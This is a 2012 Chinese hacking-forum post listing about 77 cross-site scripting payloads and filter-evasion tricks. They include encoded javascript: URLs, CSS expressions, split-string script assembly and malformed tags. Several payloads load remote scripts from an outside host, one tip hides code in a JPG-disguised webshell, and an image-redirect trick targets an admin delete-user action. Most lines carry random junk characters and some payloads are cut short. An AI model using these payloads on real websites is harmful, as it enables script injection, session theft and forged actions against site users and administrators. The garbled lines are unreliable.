找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2238|回复: 0
打印 上一主题 下一主题

xss详细利用大全1

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:04:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
跨站图片shell9 s  m$ V4 Z# H& D
XSS跨站代码  <script>alert("")</script>
2 @* ^& W3 G( K0 n. A; k; B( d6 E  p% ^9 `5 B
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马3 p; A( s5 Z3 M
4 J' f& n& y/ ^4 ^6 ]9 @7 ~" J

0 N5 z: y  h0 s& m# {. x4 i/ G) N" B* U( t, q  J) f/ ]* v
1)普通的XSS JavaScript注入8 ^+ d0 L" ?/ F* Q. m0 e
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
, S# s6 M: }' w! N' x8 h6 z. ^$ M$ n
(2)IMG标签XSS使用JavaScript命令
; N5 l+ M0 O8 j; c  ~  ^. }<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ X6 @, \/ ]1 U2 y4 I( r  g- ~
4 C  H/ d' s# O5 Q
(3)IMG标签无分号无引号# A4 v8 h, t, h9 X1 A. ^
<IMG SRC=javascript:alert(‘XSS’)>
: E8 Y1 o. c4 ~; N, K" l
  O2 A. ?, s% `/ t, }; X$ ~' e(4)IMG标签大小写不敏感5 q3 c9 v- \% p
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>1 V4 c6 l. P0 S' S0 ^
( K/ F# ^3 O2 d
(5)HTML编码(必须有分号)
. L# B# [9 h5 o/ B, k5 `<IMG SRC=javascript:alert(“XSS”)>& [& c2 f/ I: R" S( F7 F+ s
' s% c* D: m  f( p) ?, F1 j
(6)修正缺陷IMG标签; K) ~1 A8 |3 l& o) @" A( ?" m8 D( E0 H
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>$ v% w! w3 X. N* b# x

1 v- X' ?. X" O: Y( ^. W- q(7)formCharCode标签(计算器)6 i0 v0 R4 R1 N1 P) I
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>$ x# ]9 H/ j/ S1 w2 J5 r

" W8 h% O# l8 F3 f5 G2 r6 O; X7 p. X(8)UTF-8的Unicode编码(计算器)  A9 i: U& M4 o
<IMG SRC=jav..省略..S')>
  P" H5 z. j, I! W: x. U( `5 b3 c; p+ l! K! u5 z; t
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
0 L: z* g7 |4 R% w<IMG SRC=jav..省略..S')>0 s) H1 \8 H4 j$ X
% Y; A+ S' K7 F* q
(10)十六进制编码也是没有分号(计算器)' P6 `8 M- b$ h- F  S
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
8 |! a8 n# j$ F2 [1 n
, d% g% l$ F$ N8 H(11)嵌入式标签,将Javascript分开
* v: ]1 P" A- g: G<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 l. x# t7 ^/ Q# o: T2 \" c1 a5 M3 \( h
(12)嵌入式编码标签,将Javascript分开7 g$ P9 {4 z" F% P; Z
<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 l% d& S2 K7 W9 I' _1 B# @1 S
4 w! W; K0 B  T: B! w4 O5 g(13)嵌入式换行符; k7 k7 c, w* ~1 o/ W- u( v9 U
<IMG SRC=”jav ascript:alert(‘XSS’);”>9 ~, @. T6 A6 O9 ~9 B

9 P8 Z0 l$ i- n8 j5 E" w(14)嵌入式回车/ y- P9 s; e: n/ y& D3 w
<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 E# v' s6 W7 n5 o
1 x& \' S; V- c% t7 L$ U(15)嵌入式多行注入JavaScript,这是XSS极端的例子$ s, K( x: k5 H% X. R: p
<IMG SRC=”javascript:alert(‘XSS‘)”>
" U" v; y2 N4 g6 h/ [8 q" |& A6 I* v5 b" V# s6 h
(16)解决限制字符(要求同页面)
! W/ }8 z9 {* o& Z3 Q<script>z=’document.’</script>
4 j4 k' c& a; g8 e( Y% ^: i" I<script>z=z+’write(“‘</script>
5 k5 v5 }* }- w<script>z=z+’<script’</script>( b# W8 J1 K1 p. q
<script>z=z+’ src=ht’</script>
$ f6 \3 J* ]: h' y( O<script>z=z+’tp://ww’</script>% r0 x8 W: b( v
<script>z=z+’w.shell’</script># \& I. k% ?' I8 L
<script>z=z+’.net/1.’</script>( n" D% x# J# n3 g# Z+ I
<script>z=z+’js></sc’</script>
; X7 l. Y& x0 k( T<script>z=z+’ript>”)’</script>
2 C& Q. I9 d/ K6 g8 {<script>eval_r(z)</script>: E, v/ L5 x1 |* j9 J8 R/ A
5 f' k3 M5 s( J! q. ?# M
(17)空字符
7 l" x  |+ Q2 e9 ]perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out4 k  R1 z  ?  _% j# U8 O
. d. D. c6 H2 \. O1 I( X
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用) A+ _, H2 i3 W- z0 r; ^6 A# ?
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out, y+ K5 l1 s9 L; B7 |1 B

1 m' [/ ~9 Q( K) W& X. L6 \" j(19)Spaces和meta前的IMG标签, t/ |. u$ Z$ g! C- p; T
<IMG SRC=” javascript:alert(‘XSS’);”>, s" Y! o( w9 A8 @2 l
, A" g8 ~9 d9 O: j! H- f0 T4 T
(20)Non-alpha-non-digit XSS
( [+ `, |4 }1 p2 y+ L9 s1 j<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
6 P% A+ I) l8 d  t' i% w/ s2 G" L  Z; n4 ?, _: z
(21)Non-alpha-non-digit XSS to 2' e. B: i& F% T. u# q1 Y8 n& p: p% h
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>$ I+ b- z# W' Z0 g
8 e6 ?  t* [0 x! a6 R. t* G& }
(22)Non-alpha-non-digit XSS to 3
1 h. G" O- B2 {  e$ d- \" X1 u7 n2 W$ M<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>' J, u  q& `0 O1 M: ^1 @
8 `1 D" t, g6 _( Y: Y
(23)双开括号
8 U6 J  f$ g; H' g5 i* W( \8 ^3 T<<SCRIPT>alert(“XSS”);//<</SCRIPT>4 K! B# b' `- W! w4 n
" j( k% S, S" `4 `
(24)无结束脚本标记(仅火狐等浏览器)
& H7 ~+ h5 j7 P6 t" A5 A' {<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>+ ]5 t( `3 u- m6 C

, r7 u: S( j* j" ]& s1 j$ K(25)无结束脚本标记2
2 N0 ?9 K7 m' m& y& U<SCRIPT SRC=//3w.org/XSS/xss.js>
' z% V, h/ S; ?: g4 }$ Q8 _# x* `
(26)半开的HTML/JavaScript XSS
* |' Z: N! Q* P( y9 ~<IMG SRC=”javascript:alert(‘XSS’)”5 \  H. S( M/ u* ]: ^: C1 ~" \
" t) G6 H* {( R4 R
(27)双开角括号
4 }$ P- C6 f6 N' ~4 ~7 B9 B0 L<iframe src=http://3w.org/XSS.html <
$ D  C6 k. |' \5 r- q- g5 e2 w
# b1 J1 |5 A7 q5 H+ C! l# M(28)无单引号 双引号 分号2 P# h$ }% L2 h" j, w; @, W5 r
<SCRIPT>a=/XSS/
/ [2 t% K$ }1 m; M# dalert(a.source)</SCRIPT>; C6 T% u# P: Q, z* X0 d, d

, f; c- Y  y3 u9 [6 C(29)换码过滤的JavaScript
9 e7 R6 r" q! P6 {1 _! Q2 {% y9 M) y/ k\”;alert(‘XSS’);//
  ^4 U+ s0 J5 O4 U3 D, c" E
3 J8 f7 S" m, K% |& D(30)结束Title标签& o* ?6 R9 ?7 A- ^9 ^* Q5 s) n; Y
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
' e. N' l3 R% e9 ^1 ~  H8 m& w! B4 a2 Q! f. d/ w
(31)Input Image
  N6 T# p1 @" |, a; b+ I<INPUT SRC=”javascript:alert(‘XSS’);”>
. a1 \/ K6 W5 {7 |( c
* Y% Y+ w8 i6 J6 p6 F4 d(32)BODY Image
( p9 E, p/ Z, C: {<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
- w# n" }; @: o4 N* N& W$ y# p
0 `2 f( m# _) ]' a0 {) l(33)BODY标签
! z* ?8 [# V# e& ^& E# a+ {<BODY(‘XSS’)>
8 v% T/ |6 ?$ }' [. Z6 x" B
$ h. P! E1 {; g( `5 P(34)IMG Dynsrc- A' e+ }/ `8 f! N$ q& C
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
7 g# v4 T; D# k( o6 F: }' B* K- s( e; w, Z3 l. H+ E
(35)IMG Lowsrc
. Q: V/ S$ J) B+ Y7 ?1 Z<IMG LOWSRC=”javascript:alert(‘XSS’)”>
9 C/ O* }9 r- S  d: z3 w! ]+ B. m. U4 f+ C7 _( [
(36)BGSOUND
0 x& s8 i- t  Z/ T+ f0 D) q<BGSOUND SRC=”javascript:alert(‘XSS’);”>
6 k1 e! @( @5 W; X7 D! Y' x+ J; ]5 K# v1 Z# @( `# e* l
(37)STYLE sheet
3 [/ c/ H+ O/ C+ p<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
0 D* D% _  V7 _) d1 {3 L% Y, @3 N- q3 ?  Q
(38)远程样式表
" X0 a0 E3 [. c% m<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>, Z  {- Q! h* q" F2 n  J8 v2 C& ?4 v+ d

9 n: {( E& \5 @: k% e6 H(39)List-style-image(列表式)9 D4 I. B' k; Q/ C
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
& w' r5 b7 D: q" c  u3 `- V7 }
5 O6 }7 _  N4 S& x. S8 V(40)IMG VBscript$ G8 u. t' g  h% q
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
- X0 E( W, [) ?& c' O6 {  f, R; v
( A3 g! R' s4 l& d(41)META链接url
7 A( q0 e2 Y+ w) g7 L* R) N1 J" ^. Q<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>7 g. l, B8 }5 T' s2 L  w1 @) q, y
4 M' \+ G  y6 z& h) a" E
(42)Iframe% S3 |5 J  O% U- j& q$ b
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
/ f4 v* M3 M% z) v3 N(43)Frame) Z# r( V7 m" ^3 {' C
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>, z3 w  v  S8 M7 ^- t

* p* P7 d2 A1 u0 \4 `8 D(44)Table
2 x- j' f3 y- \<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>1 O, Z3 {- n  s6 Y! b/ `! m1 f  O

5 J. m4 K# I4 Z' {, t+ T(45)TD: t# C  O: W% \" m# }
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
. U' {* q/ v. t2 c8 o% P' F! B- e0 O, P; l' P% K2 X+ D
(46)DIV background-image
/ w' @+ }0 b# e+ t0 H! M0 ?1 v# N<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>. b5 Y$ b5 A: E4 V# M) A: K  s* P  K
$ v0 n  R/ l8 E" o6 G
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
+ m5 v4 c: ~, N+ ~% g7 [<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>0 b" \  R: l' {( [/ g( A1 B
' B% ~; V' b% k! H& c
(48)DIV expression
7 i  [) s/ q- K+ W3 q<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
0 B" ?9 f  Y- _7 H3 B9 t, }
9 S& `2 n! t3 N8 }  @(49)STYLE属性分拆表达: ?, W0 K7 k; s' s
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>0 B, P9 |7 W7 x; w; O( u- l. b
! Y1 A0 l! F) E
(50)匿名STYLE(组成:开角号和一个字母开头)+ x3 y4 l4 |: c8 ~1 i+ J% @
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
+ h$ `- G0 h& [  B- x1 L/ l! Q3 J( F1 }$ K! _* x. @* Z) u) v1 K- v3 c5 s
(51)STYLE background-image
( X/ h5 G7 o, D- G5 O- o<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
& p* f3 ~. f) j; S
1 ?+ z7 A1 d4 A- H1 ](52)IMG STYLE方式9 S  ^1 E9 e' P
exppression(alert(“XSS”))’>! h& Z9 F# E, N+ P. r) p5 c
1 O: F/ c8 N# @" a
(53)STYLE background
% Z1 x; `# x/ O5 F5 P<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>5 O: T9 H  W( h. i  J. p

# U0 h5 Z' ~* Y; _6 o(54)BASE$ v# B5 d) g: {- f) \* @# u
<BASE HREF=”javascript:alert(‘XSS’);//”>
; P# ^- T4 r. ?2 l! I. W% v7 |. E1 _% Q
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS2 q( [5 m9 }$ V+ {* W! w
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
5 w1 ~, _# R- j! I
0 C3 v( T/ C9 T  n  A, L+ `( i(56)在flash中使用ActionScrpt可以混进你XSS的代码
% v2 \2 Y# x. z& P% U9 g7 z. Ba=”get”;! O7 Q0 \0 S/ _0 y4 m+ ?' c$ z
b=”URL(\”";/ `! h+ `$ s3 H
c=”javascript:”;5 X! N0 T& K9 j$ l
d=”alert(‘XSS’);\”)”;: L; t- t/ u8 F1 f
eval_r(a+b+c+d);
4 K" }0 j  i( E0 R; T, ?/ b8 m
5 @+ \4 N  H% X+ N(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上& h1 x4 K9 w. E# w5 ]+ S4 u
<HTML xmlns:xss>7 [( E7 X' l, R
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
+ w* g! B9 `9 W7 r' i<xss:xss>XSS</xss:xss>
8 p! F" w% I, T, V</HTML>, C  a9 N! r0 h: I$ R
5 n5 }2 @" [: S7 \+ N# V9 Z& l
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用& [+ Z! T# R" q! B: O0 _2 ?
<SCRIPT SRC=””></SCRIPT>
. i: U" e1 c/ f/ n) r" U7 @5 x/ x+ |, V6 x
(59)IMG嵌入式命令,可执行任意命令" W* p  i; j2 y; c+ \# k
<IMG SRC=”http://www.XXX.com/a.php?a=b”>: D1 c. Q0 ~8 [

) C7 O% X7 B& Z& P" H1 m(60)IMG嵌入式命令(a.jpg在同服务器)# f% f* ^& v, s& r4 d; [) C' f
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
2 c: R- n5 M0 v2 q+ k( y. F1 a% B& k: S$ F7 i4 ?6 v0 T
(61)绕符号过滤
; \  N4 U1 x0 J, s" C3 `8 h, @: O<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>9 |5 T$ d7 r: u4 j) y! l

0 f$ l0 `4 Z6 I5 d8 {(62)
5 S# a6 U' ?& |: K; y" u<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>5 z! \7 C" Y5 x$ {8 C- y* [! [

! Z; a' Y* O1 c# n# B(63)
/ x; d% `6 ]0 N9 P! \: ^2 o- h& Q<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
# k) B' l( ^# A% P, m/ _4 \
, r( S7 [  f0 B8 K: c0 w# z5 s) q) @, q(64)! ~% L+ l/ s: n! t
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>5 K8 [0 F1 s/ w1 ^$ ?

7 Z6 h! }$ w2 z(65)
# Z+ J' [* E/ [- X<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>- L$ a8 n  k) X% t

% |; W4 X9 ?7 n0 c(66)
1 O* V3 ?2 o2 E# z/ a<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>% Y& s% D9 W& R

: i6 O0 _& w/ F(67)9 p. h% f$ M$ }
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
1 I3 ?9 |) b) C* w; K8 k+ x/ `  h: v
(68)URL绕行5 e7 Q. ?5 U7 @. F. r
<A HREF=”http://127.0.0.1/”>XSS</A>7 F$ D$ ^" }8 W/ p. t$ {
4 G5 o/ W+ T- D$ Q& S( b
(69)URL编码) Y9 Y9 I( c8 ~- w, Z* t
<A HREF=”http://3w.org”>XSS</A># \+ B2 z" j  n% u+ Y

+ |3 a7 f/ `0 L! R, u3 o(70)IP十进制
1 k' `% Z% m% a4 G+ ^" z<A HREF=”http://3232235521″>XSS</A>
4 f- h; ^5 g) t% _. h; B
& D9 \) W- F9 t2 ]- |* p; @(71)IP十六进制
, B. @( T0 D9 [; ]# y% L<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>9 e9 `3 k" }$ }+ H' ?
% `/ o, E1 p9 {9 y- v
(72)IP八进制$ ~- x% u+ H, S* Q
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
) P! \, E4 M  f1 Y, s5 d* K
* B, b, U' V/ G4 y. l% v2 K(73)混合编码- j- f7 F( X* m( a1 a
<A HREF=”h( P' O5 r, T7 F1 v- |" Q3 Z
tt p://6 6.000146.0×7.147/”">XSS</A>5 v+ H1 k7 N/ l2 k
& t9 }- Y" L0 m) A* i  D
(74)节省[http:]
; ^2 @" x9 ]4 X8 i# p<A HREF=”//www.google.com/”>XSS</A>
/ v' {( \$ v8 l* e4 b& a
6 X. {  A  V2 R7 u4 i3 j(75)节省[www]% t( u/ {' i: m$ M0 v
<A HREF=”http://google.com/”>XSS</A>
0 P% ]8 j8 N2 Z$ w! b5 v! a4 N0 `5 C* q+ b' ~. ~
(76)绝对点绝对DNS
& \( O2 @/ P2 W2 o3 J<A HREF=”http://www.google.com./”>XSS</A>, d0 p' z) F6 Y% G( a; P
* M7 q' M& a  @& ~4 h. c
(77)javascript链接5 u& L$ \" f% @/ d. L
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
( Z2 Q/ P) D3 j7 u- x$ B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表